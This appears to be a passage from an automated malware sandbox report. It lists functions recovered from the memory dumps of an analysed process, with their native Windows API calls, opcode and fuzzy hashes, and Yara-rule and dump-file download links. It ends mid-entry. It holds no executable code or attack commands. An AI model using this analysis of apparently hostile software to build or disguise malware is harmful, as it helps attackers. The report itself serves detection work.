                                                                                                                                                              Function 001381BB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,00133B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133B97,007A002E,00000000,00000060,00000000,00000000), ref: 0013820D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID: .z`
                                                                                                                                                              • API String ID: 823142352-1441809116
                                                                                                                                                              • Opcode ID: ce5a59357561e250a55e79921dfae24911857795577ca36f0f8454bf2aa8ee00
                                                                                                                                                              • Instruction ID: 782159adb5371116a6f3b594a9fe6a73709876f3a32d831e48e66f58b10cd8af
                                                                                                                                                              • Opcode Fuzzy Hash: ce5a59357561e250a55e79921dfae24911857795577ca36f0f8454bf2aa8ee00
                                                                                                                                                              • Instruction Fuzzy Hash: 24F0ECB2614149ABCB08DF98DC84DEB7BE9BF8C314B15865DFA5D93241D630E851CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00138270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(00133D52,5E972F59,FFFFFFFF,00133A11,?,?,00133D52,?,00133A11,FFFFFFFF,5E972F59,00133D52,?,00000000), ref: 001382B5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                              • Instruction ID: eb123fa30e78cca04331e7308c8f9e05c0002eff0ea905eae5719fae45ad701a
                                                                                                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                              • Instruction Fuzzy Hash: E2F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0013826B, Relevance: 1.5, APIs: 1, Instructions: 35filenativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtReadFile.NTDLL(00133D52,5E972F59,FFFFFFFF,00133A11,?,?,00133D52,?,00133A11,FFFFFFFF,5E972F59,00133D52,?,00000000), ref: 001382B5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                              • Opcode ID: 1e39074f4b119050b13e7bbc63b49b17c222be47f3f482fb410bfc0eafb1267c
                                                                                                                                                              • Instruction ID: bf95d5e671f536c867f7bfa7040d6d8cea49a2c70c11a0aeb1e5cc3c28d7257b
                                                                                                                                                              • Opcode Fuzzy Hash: 1e39074f4b119050b13e7bbc63b49b17c222be47f3f482fb410bfc0eafb1267c
                                                                                                                                                              • Instruction Fuzzy Hash: 92F01DB6204144AFCB04DFA8D890CEB77E9EF8C214B158759FD5D93202C634E855CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0013839D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001383D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: 3ce74e1a9b52b9ecfdf14a4a732d500dcd83de070b18faa558cede4919135fcf
                                                                                                                                                              • Instruction ID: 18e8738b8a31e8a7af52a86b4a45162f2551d29b8fb4043aca1ac3393bbb086b
                                                                                                                                                              • Opcode Fuzzy Hash: 3ce74e1a9b52b9ecfdf14a4a732d500dcd83de070b18faa558cede4919135fcf
                                                                                                                                                              • Instruction Fuzzy Hash: 8FF01CB1200108AFDB14DF88DC81EE777ADAF98350F118649FA0D97241C630E811CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001383A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001383D9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                              • Instruction ID: aaec7bf78d1c3f89d311b239031784a68a67be2e216fcb859868a87c6e7d4da2
                                                                                                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                              • Instruction Fuzzy Hash: 8BF015B2200208ABCB14DF89DC81EAB77ADAF88750F118548FE0897241CA30F810CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001382EA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00133D30,?,?,00133D30,00000000,FFFFFFFF), ref: 00138315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: b71f527b25b07e0059cdc7382bb1cebd07533d14afec44ba5103d6e13e113323
                                                                                                                                                              • Instruction ID: fae3ef5483e98b4291456573c4a082915fbf21af84c9e9a5aca9e8721ddecf0f
                                                                                                                                                              • Opcode Fuzzy Hash: b71f527b25b07e0059cdc7382bb1cebd07533d14afec44ba5103d6e13e113323
                                                                                                                                                              • Instruction Fuzzy Hash: 64E08CB62402106FD714DFD8CC49EA73B29EF44260F244598FA49EB282C670E6028AD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 001382F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • NtClose.NTDLL(00133D30,?,?,00133D30,00000000,FFFFFFFF), ref: 00138315
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, Offset: 00120000, based on PE: false
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3535843008-0
                                                                                                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                              • Instruction ID: 0f43f0842749b55e64d6ba9343fc08d31ddb813d33d69316777d22d941389286
                                                                                                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                              • Instruction Fuzzy Hash: 22D012752003146BD710EFD8DC45E97776CEF44750F154455BA185B242C930F90086E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 021400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 021407AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FAB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                              • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                                                                                                                              • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                                                                                                                              • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390335585.0000000002220000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390341218.0000000002224000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390345903.0000000002227000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390352303.0000000002230000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390389715.0000000002290000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0213FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2390231666.0000000002130000.00000040.00000001.sdmp, Offset: 02120000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2390223337.0000000002120000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 0000000C.00000002.2390330702.0000000002210000.00000040.00000001.sdmp Download File
